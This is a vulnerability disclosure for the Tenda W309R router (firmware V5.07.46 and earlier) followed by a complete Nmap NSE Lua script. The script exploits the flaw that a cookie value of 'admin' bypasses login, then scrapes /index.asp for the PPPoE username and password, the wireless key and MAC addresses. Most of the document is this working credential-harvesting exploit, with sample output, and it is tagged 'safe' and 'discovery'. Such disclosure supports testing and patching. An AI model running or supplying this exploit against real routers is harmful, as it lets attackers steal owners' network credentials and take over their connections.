Tenda Wireless Router W309R doesn’t have proper authentication for the web application console. Though the application asks for a password, it has poor cookie management which allows a user to log in without providing the password. The application uses the cookie value “admin” to access the private pages, whose page source reveals configuration details such as the PPPoE username, PPPoE password, wireless authentication key, MAC addresses, etc. Affected firmware versions are V5.07.46 and earlier.
To be updated
local nmap = require "nmap"
local shortport = require "shortport"
local table = require "table"
local http = require "http"
local stdnse = require 'stdnse'
description = [[
Tenda W309R allows an attacker to access the configuration detailed with no
authentication.
Firmware Tested : V5.07.46
Thanks & Credits : Mahesh Gavkar, Samandeep Singh (@samanLEET), Amit
Ghadigaonkar
]]

---
-- @usage
-- nmap host --script http-tenda --script-args user=tenda
--
-- @output
-- 80/tcp open http
-- | http-tenda:
-- | PPPoE Username : home_user
-- | PPPoE Password : 12345
-- | Wireless Password : 12345678
-- | Clone MAC : AA:AA:AA:AA:AA:AA
-- |_ Face MAC : BB:BB:BB:BB:BB:BB
--
-- @args user Value sent in the Cookie header of the request for /index.asp
--            (defaults to "admin" when the argument is not given).
---

author = "Sanoop Thomas a.k.a @s4n7h0"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = { "safe", "discovery" }

-- Run on any port that looks like an HTTP service.
portrule = shortport.http
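--- Extract the quoted value from a JavaScript assignment line such as
-- <code>var def_PUN = "home_user";</code>.
--
-- The original did unguarded arithmetic on the results of string.find, so a
-- line without both delimiters raised a Lua error and aborted the script.
-- Both searches are now plain (non-pattern) and the function returns nil
-- when either delimiter is missing or the input is not a string.
--
-- @param line The line of page source to parse.
-- @return The text between the first '"' and the first '";', or nil when
--         <code>line</code> is not a string or lacks either delimiter.
function formatme(line)
  if type(line) ~= "string" then
    return nil
  end
  -- Plain find: the delimiters contain no pattern magic, but be explicit.
  local start = string.find(line, '"', 1, true)
  local stop = string.find(line, '";', 1, true)
  if not start or not stop then
    return nil
  end
  -- '";' begins with '"', so stop >= start always holds here.
  return line:sub(start + 1, stop - 1)
end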
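--- Collect the configuration values exposed in the body of an HTTP response.
--
-- Each line of the body is checked for the marker strings below; a matching
-- line has its quoted value extracted with formatme(). Markers are matched
-- with plain string.find, so they are taken literally (the original used
-- line:match, which treated them as patterns).
--
-- Unlike the original, a nil response or a response whose body is not a
-- string yields an empty table instead of raising an error on r.body:gmatch,
-- and a line whose value cannot be extracted (formatme() returning nil) is
-- skipped rather than concatenated.
--
-- @param r An http.get response table; only <code>r.body</code> is read.
-- @return A sequence of "<label> : <value>" strings in the order the lines
--         appear in the body (empty when nothing was found).
function fetchinfo(r)
  local tenda = {}
  if not r or type(r.body) ~= "string" then
    return tenda
  end

  -- { literal text identifying the line, label used in the output }
  local markers = {
    { "def_PUN = ", "PPPoE Username : " },
    { "def_PPW =", "PPPoE Password : " },
    { "def_wirelesspassword =", "Wireless Password : " },
    { "var cln_MAC =", "Clone MAC : " },
    { "var fac_MAC = ", "Face MAC : " },
  }

  for line in r.body:gmatch("[^\r\n]+") do
    for _, entry in ipairs(markers) do
      local marker, label = entry[1], entry[2]
      if string.find(line, marker, 1, true) then
        local value = formatme(line)
        -- Skip lines where no quoted value could be extracted.
        if value ~= nil then
          tenda[#tenda + 1] = label .. value
        end
      end
    end
  end
  return tenda
end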
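--- Script entry point: request /index.asp with the configured cookie value
-- and report any configuration values found in the response body.
--
-- The cookie value is taken from the <code>user</code> script argument and
-- defaults to "admin". Changes from the original: the unused
-- <code>config</code> local is dropped, a nil response or a response without
-- a string body is handled before fetchinfo() sees it, and nil is returned
-- when nothing was extracted so Nmap prints no empty section for hosts that
-- do not expose anything.
--
-- @param host The target host table supplied by Nmap.
-- @param port The target port table supplied by Nmap.
-- @return Formatted output of the extracted values, or nil when the request
--         yielded no usable body or no values were found.
action = function(host, port)
  local user = nmap.registry.args.user or "admin"

  local options = {
    cookies = user,
  }
  local response = http.get(host, port, '/index.asp', options)

  -- NOTE(review): the exact shape of a failed http.get response depends on the
  -- Nmap version; guarding on a string body covers both nil and error tables.
  if not response or type(response.body) ~= "string" then
    return nil
  end

  local found = fetchinfo(response)
  if #found == 0 then
    return nil
  end
  return stdnse.format_output(true, found)
end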